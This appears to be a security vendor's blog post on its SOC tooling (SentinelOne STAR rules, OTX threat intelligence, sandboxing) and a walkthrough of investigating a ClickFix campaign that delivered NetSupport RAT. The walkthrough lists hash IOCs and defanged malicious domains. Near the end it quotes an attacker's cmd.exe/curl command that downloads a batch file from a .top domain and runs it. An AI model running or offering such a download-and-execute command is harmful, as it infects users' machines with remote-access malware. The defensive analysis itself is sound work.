A SOC Toolbelt
To keep pace with rapidly evolving threats and the decreasing breakout times of attackers, the LevelBlue security operations team leverages multiple tools and key partnerships to shorten the time between detection and response. Below are some examples of the tools used by our SOC and some of the circumstances in which each tool would be used.
A Partnership with SentinelOne
Through LevelBlue’s Managed Endpoint Security with SentinelOne, our SOC has provided exceptional value with greater protection and endpoint visibility to our customers. The SOC was able to greatly reduce the time between detection and response with STAR (Storyline Active Response) alarms within SentinelOne. These STAR alarms are custom built by our team and are informed by proactive detections from our threat hunters around recent threats and TTPs (Techniques, Tactics, and Procedures).
By utilizing threat intelligence reports and data at hand, our team was able to perform a deeper review into the TTPs of recent threats. This allowed for the creation of custom rules to more quickly detect IOCs (Indicators of Compromise) within our customers’ environments. Our LevelBlue Labs threat intelligence team also utilized this information to create new rules in USM Anywhere, our open XDR platform.
As a trusted security partner, LevelBlue is always striving to improve our detection and response times to increase value and provide more proactive support to our customers. These tools are vital for us to improve response times and prevent threats from affecting our customers.
Bundling Managed Endpoint Security and Managed Threat Detection and Response is a great option for customers who lack data ingestion from endpoints in USMA and want improved visibility. The bundle also benefits customers looking to balance the cost of third-party security partners with the costs of additional monitoring tools. Instead of buying multiple tools to bring potentially noisy data into USMA, bundling provides comprehensive visibility across your endpoints along with the 24/7 monitoring that is part of our Managed Threat Detection and Response offer.
Open Threat Exchange (OTX)
The LevelBlue Labs Open Threat Exchange (OTX) is another integral tool our analysts depend on during alarm triage and investigation. This platform is one of the largest threat intelligence communities with over 330K+ members worldwide.
LevelBlue Labs continuously updates OTX, and threat intelligence from OTX integrates seamlessly into LevelBlue’s USMA platform. Our customers’ environments are scanned for OTX pulse matches and IOCs. If an indicator from a pulse the customer is subscribed to is discovered in their environment, an alarm is generated.
Upon examining an alarm in USMA, analysts are directed to the associated pulse. The analyst can use the additional IOCs associated with that pulse to further their investigation.
Centralizing this information in USMA helps our analysts streamline incident triage and these pulses can be compared with other Open-Source Intelligence (OSINT) to give analysts more context in their investigation. Analysts can also use the OTX Pulse ID directly within USMA to query the customers’ environment for any additional IOCs associated with the threat being investigated.
Figure 1: Event search of customer instance using OTX ID
STAR Rules
The LevelBlue SOC has also created a custom alerting system based on high-fidelity detection methods that has increased response times by bringing these alerts to the forefront of our analysts’ attention. These high-fidelity methods, whether related to custom STAR rules or user compromise detections, are just another example of the proactive work our SOC team does to improve value for our customers.
SentinelOne’s STAR rules have proven to be an invaluable addition to the detection toolset already utilized by the MDR SOC. When a threat is detected and an alarm has been raised, a SOC analyst will use different tools for analyzing the threat and its related artifacts.
The LevelBlue SOC Investigates: ClickFix
ClickFix is a social engineering campaign that exploits the appearance of legitimacy to trick victims into executing malicious scripts. In the following investigation, the SOC used several tools including Joe’s Sandbox, SentinelOne Deep Visibility, and SentinelOne Blocklist to analyze a ClickFix attack. The investigation began when the SOC received an alarm for a command line that is indicative of ClickFix malware (see figure 2).
Figure 2: ClickFix alarm in USMA
The command line shown above allowed our team to obtain the file and information from that file. With this, our team could search across our customer base to determine if the file existed in any other environments and add the file hashes to our global SentinelOne blocklist.
To review this command line, the SOC would typically utilize an online Sandbox service such as Joe’s Sandbox or AnyRun. Joe’s Sandbox is preferable in the event there is customer data present, because it is run in a private tenant. AnyRun is also a powerful tool, but their free service is not private and used only if it is confirmed that no customer data is contained.
After running the command line above in Joe’s Sandbox, we received an in-depth activity report (see figure 3 below).
Figure 3: Initial command line executed in ClickFix attack
After running the command in Joe’s Sandbox, nothing popped up on the front end, but we did get a list of suspicious files dropped in the report that was generated (see figure 4 below).
Figure 4: List of suspicious files from Joe’s Sandbox report
From the file we were able to retrieve the SHA1 hashes, and search for potential compromise across our bundled customers’ environments. Using SentinelOne Deep Visibility, our SOC team wrote a simple query searching the File Hash fields for any of the hashes obtained in our report:
#hash contains ( “A48C95DF3D802FFB6E5ECADA542CC5E028192F2B” , “7EC84BE84FE23F0B0093B647538737E1F19EBB03” , “C2E5EA8AFCD46694448D812D1FFCD02D1F594022” , “3D199BEE412CBAC0A6D2C4C9FD5509AD12A667E7” , “98DD757E1C1FA8B5605BDA892AA0B82EBEFA1F07” , “01873977C871D3346D795CF7E3888685DE9F0B16” , “C4E27A43075CE993FF6BB033360AF386B2FC58FF” , “906F7E94F841D464D4DA144F7C858FA2160E36DB” , “A556209655DCB5E939FD404F57D199F2BB6DA9B3” , “AD464EB7CF5C19C8A443AB5B590440B32DBC618F” )
Running this query showed us 5 detections from an incident that occurred a week prior in a different customer’s environment (see figure 5 below).
Figure 5: Detections from query searching for hashes obtained in report
Our team also used SentinelOne’s Blocklist feature to add these hashes to blocklist at a global scope level to ensure the file is killed and quarantined if detected in a customer environment (see figure 6).
Figure 6: Adding SHA1 hash of NetSupport RAT to SentinelOne global blocklist
When conducting a static analysis of a website or potential phishing link, our analysts will typically use a service that visits the site and provides a screenshot of the page, along with information including the page source code, redirects, scripts, and any images. In the following scenario, our team received an alarm for a DNS request to a suspicious domain that is included in our OTX Pulses (figure 7).
Figure 7: OTX alarm in USMA for compromised website responsible for ClickFix attack
Upon initial review, the domain appeared to belong to a normal travel website. Our team then inspected the network traffic from the website scan in the HTTP tab below and looked for any redirects that occurred during the scan in the Redirects tab (see figure 8).
Figure 8: URL Scan of the compromised site islonline[.]org
Under the HTTP tab, our team saw that a file titled j.js hosted on the site navigated to the site hxxps[://]lang3666[.]top/lv/xfa[.].
Figure 9: Redirect to suspicious js file and .top domain
By running a URL scan, our analysts were able to retrieve the source code of the js file:
Figure 10: Source code of js file hosted on .top domain
Further review of the file revealed an obfuscated script that is used to determine if the user agent is a mobile phone or desktop. The script then generates an 8- digit identifier which is then appended to the URL hxxps[://]lang3666[.]top/lv/index[.]php?. This results in downloading another script to get the final payload. ClickFix attacks often follow this chain of events, and result in a command similar to the one pictured below:
Cmd.exe /c curl.exe -k -Ss -X POST https://pravaix[.]top/lv/lll[.]php -o “C:\Users\Public\jkdfgf.bat” && start /min “” C:\Users\Public\ jkdfgf.bat
Conclusion
As seen in the ClickFix investigation above, USM Anywhere’s integrations enable the LevelBlue SOC to greatly reduce the time between detection and response.
You can read more about ClickFix and the LevelBlue SOC’s recommendations to protect your environments in the LevelBlue Threat Trends Report, Fool Me Once: How Cybercriminals Are Mastering the Art of Deception.
The content provided herein is for general informational purposes only and should not be construed as legal, regulatory, compliance, or cybersecurity advice. Organizations should consult their own legal, compliance, or cybersecurity professionals regarding specific obligations and risk management strategies. While LevelBlue’s Managed Threat Detection and Response solutions are designed to support threat detection and response at the endpoint level, they are not a substitute for comprehensive network monitoring, vulnerability management, or a full cybersecurity program.
